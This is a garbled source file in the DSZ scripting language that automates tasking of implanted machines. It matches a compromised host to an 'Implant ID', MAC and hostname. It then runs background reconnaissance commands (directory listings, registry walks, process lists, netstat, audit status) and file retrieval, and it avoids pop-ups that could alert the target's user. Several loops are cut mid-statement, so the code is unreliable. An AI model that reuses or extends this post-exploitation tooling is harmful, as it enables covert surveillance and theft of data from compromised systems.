# DSZ script processes each txt file found in the TaskedCmds directory by determining the type # of tasking (dir, ipconfig, regquery, ...) and then calling the appropriate DSZ script. Each # command script is run in the background. When finished, the results are written to a file # in the TaskResults directory, located on the OpsDisk in the Logs directory. The main script # is terminated when all of the background jobs associated with tasking are completed which # is determined by using the pollStatus routine. @include "_Arrays.dsi"; @include "_CommandLine.dsi"; @include "_Xml.dsi"; @include "Include/_dirTasking.dsi"; @include "Include/_ipTasking.dsi"; @include "Include/_netmapTasking.dsi"; @include "Include/_regQueryTasking.dsi"; @include "Include/_netstatTasking.dsi"; @include "Include/_routeTasking.dsi"; @include "Include/_arpTasking.dsi"; @include "Include/_processlistTasking.dsi"; @include "Include/_auditTasking.dsi"; @include "Include/_localeTasking.dsi"; @include "Include/_tracerouteTasking.dsi"; @include "Include/_regWalkTasking.dsi"; @include "Include/_getTasking.dsi"; @include "Include/_systemInfoTasking.dsi"; @include "Include/_writeTaskedResults.dsi"; @include "_File.dsi"; @include "_LpHelperFunctions.dsi"; @include "_Menu.dsi"; bool $filesFound = true; #string $command = ""; #string $taskID = ""; #string $targetID = ""; #string $priority = ""; #bool $ok = false; #string $location = ""; string %params; if (!_ParseCommandLine($argc, $argv, %params)) { return false; } if (defined(%params{"verbose"}) && %params{"verbose"}) { %_sgEnv{'verbose'} = "true"; } else { %_sgEnv{'verbose'} = "false"; } # Get location of Commands directory to translate command parameters into dsz command string $startDir; if (defined(%params{"tasking"})) { $startDir = %params{"tasking"}; } else { $startDir = "%_sgEnv{'script_path'}/../TaskedCmds/"; } echo ("--------------------------------", GOOD); echo (GetProjectVersion(), GOOD); echo ("--------------------------------", GOOD); echo (""); # Put results in the TaskResults directory, created as sibling of Logs directory string $temp; if (!_GetLpLogsDirectory($temp) || !defined($temp)) { return false; } string $resultsDir = "$temp/TaskResults"; if (!_FileExistsLocal($resultsDir)){ `local mkdir "$resultsDir"`; } int $jobs; int $cnt = 0; #Find tasking and prompt user string $metaFiles; string $metaFilter = "*_metadata.txt"; bool $taskingFound = false; if (!FileGetFiles($startDir, $metaFilter, $metaFiles, true)){ echo ("Unable to find tasking\n", ERROR); return false; } string $filesGood; string $messageGood; string $filesMaybe; string $messageMaybe; string $filesBad; string $messageBad; for (int $i=0; $i 0) { pollStatus ($jobs, $cnt); } return true; #-------------------------------------------------------------------------- sub remove(IN string $file, REF string $good, REF string $maybe, REF string $bad) { remove($file, $good); remove($file, $maybe); remove($file, $bad); } #-------------------------------------------------------------------------- sub remove(IN string $file, REF string $array) { for (int $i = 0; $i < sizeof($array); $i++) { if (!defined($array[$i])) { continue; } if($array[$i] == $file) { undef($array[$i]); } } } #-------------------------------------------------------------------------- sub AddList(REF string $outFiles, REF string $outMessage, IN string $files, IN string $message) { for (int $i = 0; $i < sizeof($files); $i++) { if (defined($files[$i])) { _AppendString($outFiles, $files[$i]); _AppendString($outMessage, $message[$i]); } } } #-------------------------------------------------------------------------- # Runs tasking for a given metadata file #-------------------------------------------------------------------------- sub runTasking(IN string $metaFile, IN string $resultsDir, REF int $jobs, REF int $cnt) { string $command = ""; string $taskID = ""; string $targetID = ""; string $priority = ""; bool $ok = false; string $location = ""; if (%_sgEnv{"verbose"}) { echo "About to start parsing tasking"; } string $parts; SplitPath($metaFile, $parts); string $taskingDir = $parts[0]; string $resultsFile; string $mask = "*.txt"; # Assuming priority level goes from 1 to 9 for (int $j=1; $j < 10; $j++) { string $filter = "$j$mask"; string $files = ""; #string $scriptFile = ""; if (%_sgEnv{"verbose"}) { echo "Look for files:"; echo "\ttaskingDir = $taskingDir"; echo "\tfilter = $filter"; } # Run tasking associated with metadata file if (!FileGetFiles($taskingDir, $filter, $files, true)) { if (%_sgEnv{"verbose"}) { echo "Failed to get tasking files"; } } else { for (int $i=0; $i < sizeof($files); $i++) { if (%_sgEnv{"verbose"}) { echo "Examining $files[$i] for tasking purposes"; } string $timestamp; # necessary to ensure that there are no identical timestamps Sleep(1000); if (!GetTimestamp($timestamp)) { $timestamp = "_Unknown"; } else { $timestamp = "_$timestamp"; } # dir processing if (RegexMatch("_dirTasking", $files[$i])) { _dirTasking($files[$i], $command, $taskID, $targetID); $resultsFile = "$resultsDir/dir_$taskID$timestamp.xml"; if (checkDevice($command)) { runCmd ($command, $resultsFile, $taskID, $targetID, $jobs, $cnt); } } # regquery processing if (RegexMatch("_regQueryTasking", $files[$i])) { _regQueryTasking($files[$i], $command, $taskID, $targetID); $resultsFile = "$resultsDir/regquery_$taskID$timestamp.xml"; echo ("\nRegistry Query: $command", WARNING); if (prompt("\nRun anyway?", true)) { runCmd ($command, $resultsFile, $taskID, $targetID, $jobs, $cnt); } } # ipconfig processing if (RegexMatch("_ipconfigTasking", $files[$i])) { _ipTasking($files[$i], $command, $taskID, $targetID); $resultsFile = "$resultsDir/ipconfig_$taskID$timestamp.xml"; runCmd ($command, $resultsFile, $taskID, $targetID, $jobs, $cnt); } # netmap processing if (RegexMatch("_netmapTasking", $files[$i])) { _netmapTasking($files[$i], $command, $taskID, $targetID); $resultsFile = "$resultsDir/netmapTasking_$taskID$timestamp.xml"; runCmd ($command, $resultsFile, $taskID, $targetID, $jobs, $cnt); } # netstat processing if (RegexMatch("_netstatTasking", $files[$i])) { _netstatTasking($files[$i], $command, $taskID, $targetID); $resultsFile = "$resultsDir/netstatTasking_$taskID$timestamp.xml"; runCmd ($command, $resultsFile, $taskID, $targetID, $jobs, $cnt); } # routetable processing if (RegexMatch("_routeTasking", $files[$i])) { _routeTasking($files[$i], $command, $taskID, $targetID); $resultsFile = "$resultsDir/route_$taskID$timestamp.xml"; runCmd ($command, $resultsFile, $taskID, $targetID, $jobs, $cnt); } # arp processing if (RegexMatch("_arpTasking", $files[$i])) { _arpTasking($files[$i], $command, $taskID, $targetID); $resultsFile = "$resultsDir/arp_$taskID$timestamp.xml"; runCmd ($command, $resultsFile, $taskID, $targetID, $jobs, $cnt); } # processlist processing if (RegexMatch("_processlistTasking", $files[$i])) { _processlistTasking($files[$i], $command, $taskID, $targetID); $resultsFile = "$resultsDir/processlist_$taskID$timestamp.xml"; runCmd ($command, $resultsFile, $taskID, $targetID, $jobs, $cnt); } # audit processing if (RegexMatch("_auditTasking", $files[$i])) { _auditTasking($files[$i], $command, $taskID, $targetID); $resultsFile = "$resultsDir/audit_$taskID$timestamp.xml"; runCmd ($command, $resultsFile, $taskID, $targetID, $jobs, $cnt); } # locale processing if (RegexMatch("_localeTasking", $files[$i])) { _localeTasking($files[$i], $command, $taskID, $targetID); $resultsFile = "$resultsDir/locale_$taskID$timestamp.xml"; runCmd ($command, $resultsFile, $taskID, $targetID, $jobs, $cnt); } # traceroute processing (Assume dmgz is already installed) if (RegexMatch("_tracerouteTasking", $files[$i])) { _tracerouteTasking($files[$i], $command, $taskID, $targetID); $resultsFile = "$resultsDir/traceroute_$taskID$timestamp.xml"; runCmd ($command, $resultsFile, $taskID, $targetID, $jobs, $cnt); } # regwalk processing if (RegexMatch("_regwalkTasking", $files[$i])) { _regWalkTasking($files[$i], $command, $taskID, $targetID); $resultsFile = "$resultsDir/regwalk_$taskID$timestamp.xml"; echo ("\nRegistry Walk: $command", WARNING); if (prompt("\nRun anyway?", true)) { runCmd ($command, $resultsFile, $taskID, $targetID, $jobs, $cnt); } } # get processing if (RegexMatch("_getTasking", $files[$i])) { _getTasking($files[$i], $command, $taskID, $targetID); $resultsFile = "$resultsDir/get_$taskID$timestamp.xml"; # Check size before retrieving if (checkSize($command)) { if (checkDevice($command)) { runCmd ($command, $resultsFile, $taskID, $targetID, $jobs, $cnt); } } } # systeminfo processing if (RegexMatch("_systeminfoTasking", $files[$i])) { _systeminfoTasking($files[$i], $command, $taskID, $targetID); $resultsFile = "$resultsDir/systeminfo_$taskID$timestamp.xml"; runCmd ($command, $resultsFile, $taskID, $targetID, $jobs, $cnt); } } } } } #-------------------------------------------------------------------------- # RunCmd # Runs a command, but only if there are no more than the max (10). # If the number of DSZ commands is > 10, call pollJobs to determine # when another job can be added #-------------------------------------------------------------------------- Sub runCmd(IN STRING $command, IN STRING $resultsFile, IN STRING $taskID, IN STRING $targetID, REF INT $jobs, REF INT $cnt) { if ($command != "") { if (%_sgEnv{"verbose"}) { echo "Run Command: '$command'"; } bool $suc; int $idValue; int $id; int $cmdid; string $location; string $fileLoc; for (int $j=0; $j < sizeof($command); $j++) { if ($cnt > 9) { echo ("\nThere are currently $cnt tasks running...waiting for one or more to finish\n", WARNING); while ($cnt > 9) { pollJobs($jobs, $cnt); } } @record on; bool $ok = `background $command[$j]`; @record off; if (!GetCmdData("commandmetadata::id", $cmdid)) { return false; } if (!GetCmdData("commandmetadata::xmllog", $location)) { $fileLoc[$j] = "Does not exist"; } else { $fileLoc[$j] = $location; } $jobs[$cnt] = $cmdid; $cnt++; } # Write results to TaskResults directory writeResults($resultsFile, $taskID, $targetID, $command, $fileLoc); } } #-------------------------------------------------------------------------- # findTasking # Attempt to match up target with tasking by first checking PC ID and # then checking MACs #-------------------------------------------------------------------------- Sub findTasking(IN STRING $metaFile, IN bool $bQuery, OUT int $suggestionType, OUT string $suggestion) { echo "Metadata: $metaFile"; # first, get target information int $host_pcIds; string $host_macAddresses; string $host_ipaddresses; string $host_hostname = "(None)"; string $host_domain = "(None)"; if (!FindTargetInformation($host_pcIds, $host_macAddresses, $host_ipAddresses, $host_hostname, $host_domain)) { echo "Unable to find local information for comparison."; return false; } # second, get metadata information int $meta_pcIds; string $meta_macAddresses; string $meta_ipaddresses; string $meta_hostname = "(None)"; string $meta_domain = "(None)"; if (!FindMetadataInformation($metaFile, $meta_pcIds, $meta_macAddresses, $meta_ipaddresses, $meta_hostname, $meta_domain)) { echo ("Unable to find metadata for comparison.", ERROR); return false; } # PC ID comparison if (sizeof($host_pcIds) > 0 && sizeof($meta_pcIds) > 0) { # do comparison int $matches; bool $matchFound = false; for (int $i = 0; $i < sizeof($host_pcIds); $i++) { for (int $j = 0; $j < sizeof($meta_pcIds); $j++) { if ($host_pcIds[$i] == $meta_pcIds[$j]) { $matchFound = true; } } } int $fieldSize = 18; string $banner = ""; StrCat($banner, CenterString("Target", $fieldSize)); StrCat($banner, " "); StrCat($banner, CenterString("Metadata", $fieldSize)); string $line = ""; StrCat($line, CenterString("PC IDs", strlen($banner))); echo $line; echo $banner; echo Repeat("-", strlen($banner)); int $count = max(sizeof($host_pcIds), sizeof($meta_pcIds)); for (int $i = 0; $i < $count; $i++) { string $host = PadRightString("", $fieldSize); if ($i < sizeof($host_pcIds)) { $host = NumberToHexString($host_pcIds[$i], 16); } string $meta = PadRightString("", $fieldSize); if ($i < sizeof($meta_pcIds)) { $meta = NumberToHexString($meta_pcIds[$i], 16); } echo "$host $meta"; } int $type; string $message; if (!$matchFound) { if (sizeof($host_pcIds) > 0 && sizeof($meta_pcIds) > 0) { $type = ERROR; $message = "No match!"; SetSuggestion($suggestion, $suggestionType, "SKIP", ERROR); } else { $type = WARNING; $message = "No values to match"; } } else { if (sizeof($host_pcIds) > 1 || sizeof($meta_pcIds) > 1) { $type = WARNING; $message = "Weak Match - Multiple Ids"; SetSuggestion($suggestion, $suggestionType, "CONSIDER", WARNING); } else { $type = GOOD; $message = "Solid Match"; SetSuggestion($suggestion, $suggestionType, "DO TASKING", GOOD); } } echo("PC ID Comparison: $message", $type); } else if (sizeof($host_pcIds) > 0) { echo ("Metadata did not contain a PC ID", WARNING); } else if (sizeof($meta_pcIds) > 0) { echo ("Unable to determine ID of current PC connection", WARNING); } else { echo ("Unable to find any PC ID", WARNING); } echo(); # MAC comparison if (sizeof($host_macAddresses) > 0 && sizeof($meta_macAddresses) > 0) { # do comparison bool $matchFound = false; for (int $i = 0; $i < sizeof($host_macAddresses); $i++) { for (int $j = 0; $j < sizeof($meta_macAddresses); $j++) { if ($host_macAddresses[$i] == $meta_macAddresses[$j]) { $matchFound = true; } } } int $fieldSize = 16; string $banner = ""; StrCat($banner, CenterString("Target", $fieldSize)); StrCat($banner, " "); StrCat($banner, CenterString("Metadata", $fieldSize)); string $line = ""; StrCat($line, CenterString("MACs", strlen($banner))); echo $line; echo $banner; echo Repeat("-", strlen($banner)); int $count = max(sizeof($host_macAddresses), sizeof($meta_macAddresses)); for (int $i = 0; $i < $count; $i++) { string $host = PadRightString("", $fieldSize); if ($i < sizeof($host_macAddresses)) { $host = PadRightString($host_macAddresses[$i], $fieldSize); } string $meta = PadRightString("", $fieldSize); if ($i < sizeof($meta_macAddresses)) { $meta = PadRightString($meta_macAddresses[$i], $fieldSize); } echo "$host $meta"; } int $type; string $message; if ($matchFound) { echo("Matching MAC found", GOOD); SetSuggestion($suggestion, $suggestionType, "DO TASKING", GOOD); } else { echo("No Matching MAC found", WARNING); # only override if IDs failed if (!(defined($suggestionType) && $suggestionType == GOOD)) { SetSuggestion($suggestion, $suggestionType, "SKIP", ERROR); } } } else { echo("Insufficient MACs for a comparison", WARNING); } echo(); # IP comparison if (sizeof($host_ipAddresses) > 0 && sizeof($meta_ipAddresses) > 0) { # do comparison bool $matchFound = false; for (int $i = 0; $i < sizeof($host_ipAddresses); $i++) { for (int $j = 0; $j < sizeof($meta_ipAddresses); $j++) { if ($host_ipAddresses[$i] == $meta_ipAddresses[$j]) { $matchFound = true; } } } int $fieldSize = 15; string $banner = ""; StrCat($banner, CenterString("Target", $fieldSize)); StrCat($banner, " "); StrCat($banner, CenterString("Metadata", $fieldSize)); string $line = ""; StrCat($line, CenterString("IPs", strlen($banner))); echo $line; echo $banner; echo Repeat("-", strlen($banner)); int $count = max(sizeof($host_ipAddresses), sizeof($meta_ipAddresses)); for (int $i = 0; $i < $count; $i++) { string $host = PadRightString("", $fieldSize); if ($i < sizeof($host_ipAddresses)) { $host = PadRightString($host_ipAddresses[$i], $fieldSize); } string $meta = PadRightString("", $fieldSize); if ($i < sizeof($meta_ipAddresses)) { $meta = PadRightString($meta_ipAddresses[$i], $fieldSize); } echo "$host $meta"; } int $type; string $message; if ($matchFound) { echo("Matching IP found", GOOD); if (!defined($suggestionType) || $suggestionType == ERROR) { SetSuggestion($suggestion, $suggestionType, "CONSIDER TASKING", WARNING); } } else { echo("No Matching IP found", WARNING); # only override if IDs failed if (!(defined($suggestionType) && $suggestionType == GOOD)) { SetSuggestion($suggestion, $suggestionType, "SKIP", WARNING); } } } else { echo("Insufficient MACs for a comparison", WARNING); } echo(); # for variable & logical scoping if (true) { int $fieldSize = Max(Max(8, Max(strlen($host_hostname), strlen($meta_hostname))), Max(6, Max(strlen($host_domain), strlen($meta_domain)))); string $banner = ""; StrCat($banner, PadRightString("Field", 9)); StrCat($banner, " "); StrCat($banner, CenterString("Target", $fieldSize)); StrCat($banner, " "); StrCat($banner, CenterString("Metadata", $fieldSize)); string $line = ""; int $type = DEFAULT; StrCat($line, CenterString("Computer Name", strlen($banner))); echo $line; echo $banner; echo Repeat("-", strlen($line)); $line = ""; $type = DEFAULT; StrCat($line, PadRightString("Hostname:", 9)); StrCat($line, " "); StrCat($line, CenterString($host_hostname, $fieldSize)); StrCat($line, " "); StrCat($line, CenterString($meta_hostname, $fieldSize)); if ($host_hostName == $meta_hostname) { $type = GOOD; } else { $type = ERROR; } echo($line, $type); $line = ""; $type = DEFAULT; StrCat($line, PadRightString("Domain:", 9)); StrCat($line, " "); StrCat($line, CenterString($host_domain, $fieldSize)); StrCat($line, " "); StrCat($line, CenterString($meta_domain, $fieldSize)); if ($host_domain == $meta_domain) { $type = GOOD; } else { $type = ERROR; } echo($line, $type); if ($host_hostname == $meta_hostname && $host_domain == $meta_domain) { if (!defined($suggestionType)) { SetSuggestion($suggestion, $suggestionType, "SKIP", WARNING); } } else { echo("Computer name does not match", WARNING); # only override if IDs failed if (!defined($suggestionType)) { SetSuggestion($suggestion, $suggestionType, "SKIP", ERROR); } } echo(); } if (!defined($suggestionType)) { SetSuggestion($suggestion, $suggestionType, "SKIP", ERROR); } string $parts; string $tokens; SplitPath($metaFile, $parts); RegExSplit("_", $parts[1], 0, $tokens); string $target = $tokens[0]; if ($bQuery) { echo "Please review tasking pattern matching."; if ($suggestionType == GOOD) { echo("You have tasking for [$target]", GOOD); } else if ($suggestionType == WARNING) { echo("You may have tasking for [$target], but manual review is necessary.", WARNING); } else { echo("You do not have tasking for [$target]", WARNING); } echo ("Automated tasking script recommends: $suggestion", $suggestionType); if ($suggestionType == GOOD) { return prompt("Do you want to run tasking?"); } return prompt("Do you want to run tasking?", false); } else { return $suggestionType == GOOD; } } #-------------------------------------------------------------------------- sub SetSuggestion(REF string $currentSuggestion, REF int $currentSuggestionType, IN string $newSuggestion, IN int $newSuggestionType) { if (!defined($currentSuggestion)) { $currentSuggestion = $newSuggestion; $currentSuggestionType = $newSuggestionType; } else if ($currentSuggestionType == GOOD && $newSuggestionType != GOOD) { $currentSuggestion = $newSuggestion; $currentSuggestionType = $newSuggestionType; } else if ($currentSuggestionType == WARNING && $newSuggestionType != ERROR) { $currentSuggestion = $newSuggestion; $currentSuggestionType = $newSuggestionType; } } #-------------------------------------------------------------------------- # ComparePossibleIds # Handles comparing the metadata's id and the pc id. # Since there might be multiple formats, this function tries them #-------------------------------------------------------------------------- sub ComparePossibleIds(IN STRING $metaId, IN STRING $pcId) { if (!defined($metaId) || !defined($pcId)) { return false; } # one or both could be straight integers # or hex values with or without 0x in front. if (%_sgEnv{"verbose"}) { echo "Comparing: $metaId =?= $pcId"; } string $id1, $id2; _AppendString($id1, "$metaId"); _AppendString($id2, "$pcId"); _AppendString($id1, "0x$metaId"); _AppendString($id2, "$pcId"); _AppendString($id1, "$metaId"); _AppendString($id2, "0x$pcId"); for (int $i = 0; $i < sizeof($id1); $i++) { if (CompareId($id1[$i], $id2[$i])) { return true; } } return false; } #-------------------------------------------------------------------------- # CompareId #-------------------------------------------------------------------------- sub CompareId(IN int $id1, IN int $id2) { if (%_sgEnv{"verbose"}) { echo " Comparing $id1 =?= $id2"; } if ($id1 == 0 || $id2 == 0) { if (%_sgEnv{"verbose"}) { echo " At least one value is zero - automatic failure"; } return false; } return $id1 == $id2; } #-------------------------------------------------------------------------- # Check to see if MAC address is valid. (This should be beefed up as we figure out what valid means.) #-------------------------------------------------------------------------- Sub validateMAC (IN STRING $mac) { if (%_sgEnv{"verbose"}) { echo "Is MAC '$mac' valid?"; } if ($mac == "0") { return false; } return true; } #-------------------------------------------------------------------------- # Check file size (using dir) before pulling back get files #-------------------------------------------------------------------------- Sub checkSize (IN STRING $command) { int $size; string $parameters; RegExSplit(" ", $command, 0, $parameters); string $dirCmd = "dir "; for (int $i=0; $i 2000000) { echo ("\nThe get that you requested is over 2 Meg [$totalsize].", WARNING); if (!prompt("\nRetrieve anyway?", true)) { return false; } } return true; } #-------------------------------------------------------------------------- # Check to see if Fixed device for dir and get commands # If not, ask user if they still want to run it. (Otherwise, could get pop-up on target if not running as System) #-------------------------------------------------------------------------- Sub checkDevice(IN STRING $command) { # looking for a drive bool $ok; string $drivetype; string $parts; string $drive = ""; string $colon = ":"; string $backslash = "\\"; string $drivelist; if (RegexMatch(":", $command)) { # drive found echo $command; RegExSplit(":", $command, 0, $parts); int $start = StrLen($parts[0]); $start--; _Substring($parts[0], $start, $drive); $drive = "$drive$colon$backslash"; @echo off; @record on; $ok = `drives`; @record off; @echo on; if (!GetCmdData("driveitem::type", $drivetype) || !defined($drivetype) || !GetCmdData("driveitem::drive", $drivelist)|| !defined($drivelist)) { echo "Failed"; } for (int $i=0; $i 0 { for (int $i=0; $i < sizeof($pcFile); $i++) { _XmlElement @elements; if (_XmlReadFile($pcFile[$i], "Id", @elements)) { for (int $j = 0; $j < sizeof(@elements.$text); $j++) { AppendInteger($pcIds, @elements.$text[$j]); } } } } } return sizeof($pcIds) > 0; } #-------------------------------------------------------------------------- # Get host information #-------------------------------------------------------------------------- sub FindHostInformation(OUT string $macAddresses, OUT string $ipAddresses, REF string $hostname, REF string $domain) { @record on; @echo off; string $logsDir; if (!_GetLpLogsDirectory($logsDir) || !defined($logsDir)) { return false; } string $filter = "hostinfo_*.xml"; string $hostInfo; if (FileGetFiles($logsDir, $filter, $hostInfo, true)) { if (sizeof($hostInfo)) > 0 { for (int $i=0; $i < sizeof($hostInfo); $i++) { if (`xmlparser -file $hostInfo[$i]`) { FindHostInformation_HostInformation($macAddresses, $ipaddresses, $hostname, $domain); } } } } return true; } #-------------------------------------------------------------------------- sub FindHostInformation_HostInformation(REF string $macAddresses, REF string $ipAddresses, REF string $hostname, REF string $domain) { object $element; if (GetCmdData("element", $element) && defined($element)) { for (int $i = 0; $i < sizeof($element); $i++) { string $name; if (GetObjectData($element[$i], "name", $name) && defined($name) && $name == "HostInformation") { FindHostInformation_HostName($element[$i], $hostName); FindHostInformation_DomainName($element[$i], $domain); FindHostInformation_Interface($element[$i], $macAddresses); FindHostInformation_Ips($element[$i], $ipAddresses); } } } } #-------------------------------------------------------------------------- sub FindHostInformation_HostName(IN object $parent, REF string $hostName) { object $element; if (GetObjectData($parent, "element", $element) && defined($element)) { for (int $i = 0; $i < sizeof($element); $i++) { string $name; if (GetObjectData($element[$i], "name", $name) && defined($name) && $name == "HostName") { string $text; if (GetObjectData($element[$i], "text::text", $text) && defined($text)) { $hostName = $text; } } } } } #-------------------------------------------------------------------------- sub FindHostInformation_DomainName(IN object $parent, REF string $domain) { object $element; if (GetObjectData($parent, "element", $element) && defined($element)) { for (int $i = 0; $i < sizeof($element); $i++) { string $name; if (GetObjectData($element[$i], "name", $name) && defined($name) && $name == "Domain") { string $text; if (GetObjectData($element[$i], "text::text", $text) && defined($text)) { $domain = $text; } } } } } #-------------------------------------------------------------------------- sub FindHostInformation_Interface(IN object $parent, REF string $macAddresses) { object $element; if (GetObjectData($parent, "element", $element) && defined($element)) { for (int $i = 0; $i < sizeof($element); $i++) { string $name; if (GetObjectData($element[$i], "name", $name) && defined($name) && $name == "Interface") { string $text; if (GetObjectData($element[$i], "element[0]::text::text", $text) && defined($text)) { AppendString($macAddresses, $text); } } } } } #-------------------------------------------------------------------------- sub FindHostInformation_Ips(IN object $parent, REF string $ipAddresses) { object $element; if (GetObjectData($parent, "element", $element) && defined($element)) { for (int $i = 0; $i < sizeof($element); $i++) { string $name; if (GetObjectData($element[$i], "name", $name) && defined($name) && $name == "Ips") { string $text; if (GetObjectData($element[$i], "element::text::text", $text) && defined($text)) { for (int $j = 0; $j < sizeof($text); $j++) { AppendString($ipAddresses, $text[$j]); } } } } } } #-------------------------------------------------------------------------- # Gets metadata information #-------------------------------------------------------------------------- sub FindMetadataInformation(IN string $filename, OUT int $pcIds, OUT string $macAddresses, OUT string $ipAddresses, REF string $hostname, REF string $domain) { string $lines; # Read metadata file and compare ids if (!ReadFile ($filename, $lines)) { return false; } for (int $i = 0; $i < sizeof($lines); $i++) { if (RegexMatch("#.*", $lines[$i])) { continue; } string $match; if (RegexMatch("Implant ID:[ \t]*(.*)", $lines[$i], $match)) { AppendInteger($pcIds, $match); } if (RegexMatch("MAC:[ \\t]*(.*)", $lines[$i], $match)) { SplitLength($match, ",", $macAddresses); } if (RegexMatch("IP:[ \\t]*(.*)", $lines[$i], $match)) { SplitLength($match, ",", $ipAddresses); } if (RegexMatch("Hostname:[ \\t]*(.*)", $lines[$i], $match)) { $hostname = $match; } if (RegexMatch("Domain:[ \\t]*(.*)", $lines[$i], $match)) { $domain = $match; } } return true; } #-------------------------------------------------------------------------- sub SplitLength(IN string $value, IN string $sep, REF string $array) { string $match; if (RegexMatch("([^$sep]*)$sep(.*)", $value, $match)) { AppendString($array, Trim($match[0])); SplitLength($match[1], $sep, $array); } else { AppendString($array, Trim($value)); } } #-------------------------------------------------------------------------- sub(string) Trim(IN string $value) { string $match; if (RegexMatch("[ \\t]*([^ ]*)[ \\t]*", $value, $match)) { return $match; } return $value; } #-------------------------------------------------------------------------- sub AppendInteger(REF int $items, IN int $newItem) { for (int $i = 0; $i < sizeof($items); $i++) { if ($items[$i] == $newItem) { return true; } } return _AppendInteger($items, $newItem); } #-------------------------------------------------------------------------- sub AppendString(REF string $items, IN string $newItem) { for (int $i = 0; $i < sizeof($items); $i++) { if ($items[$i] == $newItem) { return true; } } return _AppendString($items, $newItem); } #-------------------------------------------------------------------------- sub(string) NumberToHexString(IN int $num, IN int $space) { @hex on; string $str = "$num"; # remove leading 0x string $match; if (RegexMatch("0x(.*)", $str, $match)) { $str = $match; } while (strlen($str) < $space) { $str = "0$str"; } return "0x$str"; } #-------------------------------------------------------------------------- sub(string) PadRightString(IN string $value, IN int $space) { while (strlen($value) < $space) { StrCat($value, " "); } return $value; } #-------------------------------------------------------------------------- sub(string) PadLeftString(IN string $value, IN int $space) { while (strlen($value) < $space) { $value = " $value"; } return $value; } #-------------------------------------------------------------------------- sub(string) CenterString(IN string $value, IN int $space) { while (strlen($value) < $space) { if (strlen($value) < $space) { $value = " $value"; } if (strlen($value) < $space) { StrCat($value, " "); } } return $value; } #-------------------------------------------------------------------------- sub(string) Repeat(IN string $value, IN int $count) { string $retVal = ""; for (int $i = 0; $i < $count; $i++) { StrCat($retVal, $value); } return $retVal; } #-------------------------------------------------------------------------- sub(int) max(IN int $a, IN int $b) { if ($a > $b) { return $a; } return $b; } #----------------------------------------------------------------------------------------- sub(string) GetProjectVersion() { string $resDir; if (_GetLpResourcesDirectory($resDir)) { string $xmlFile = "$resDir/Tasking/Version.xml"; _XmlElement @version; if (_XmlReadFile($xmlFile, "Version", @version)) { return @version.$text; } } return "DszTasking"; }